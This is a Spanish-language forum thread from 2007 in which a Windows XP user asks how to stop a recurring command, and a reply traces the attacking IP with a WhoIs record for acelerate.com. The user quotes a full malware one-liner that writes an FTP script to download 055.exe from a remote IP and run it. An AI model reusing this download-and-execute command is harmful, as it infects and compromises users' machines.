Ejecución de cmd.exe /c ...

Con reverse IP retorno acelerate.com, la direcion IP.


NetAlyzer WhoIs query for ACELERATE.COM on 02/01/2007 09:53:21 p.m.

[whois.crsnic.net]

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.


Domain Name: ACELERATE.COM
Registrar: NAMESCOUT CORP
Whois Server: whois.namescout.com
Referral URL: http://www.namescout.com
Name Server: NS1.ACELERATE.COM
Name Server: NS2.ACELERATE.COM
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 14-nov-2006
Creation Date: 13-nov-2001
Expiration Date: 13-nov-2007

Last update of whois database: Tue, 02 Jan 2007 19:53:01 EST <<<

Domain acelerate.com

Date Registered: 11/13/2001
Date Modified: 10/23/2006
Expiry Date: 2008-11-13
DNS1: ns1.acelerate.com
DNS2: ns2.acelerate.com

Registrant

AES Communications Bolivia
Edif multicentro piso 7
La Paz
BO
00000

Administrative Contact

AES Communications Bolivia
Javier Ishino
Edif multicentro piso 7
La Paz
BO
00000
591-2444100


Technical Contact

AES Communications Bolivia
Javier Ishino
Edif multicentro piso 7
La Paz
00000
BO
591-2444100


Registrar: Namescout.com


aventurero escribió:

Buenas taredes.
Tengo windows XP SP 1 con las actualizaciones de seguridad dadas por
MicroSoft por Internet, in cluido el SP2.
De un tiempo para acá ejecuta el mismo el siguiente comando (aparece en el
cuadro de dialogo Inicio-Ejecutar):

cmd.exe /c del i&echo open 200.105.147.70 18688 > i&echo user 1 1 >> i &echo
get 055.exe >> i &echo quit >> i &ftp -n -s:i &055.exe&del i&exit

En este mismo for me indicaron que borrara las entradas de registro
relacionadas en:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Pero siempre vueve y sale, sin importar las veces que lo haga.

Me pueden ayudar indicandome como soluciono el problema de manera
definitiva?

Gracias anticipadas.

Atentamente,

Aventurero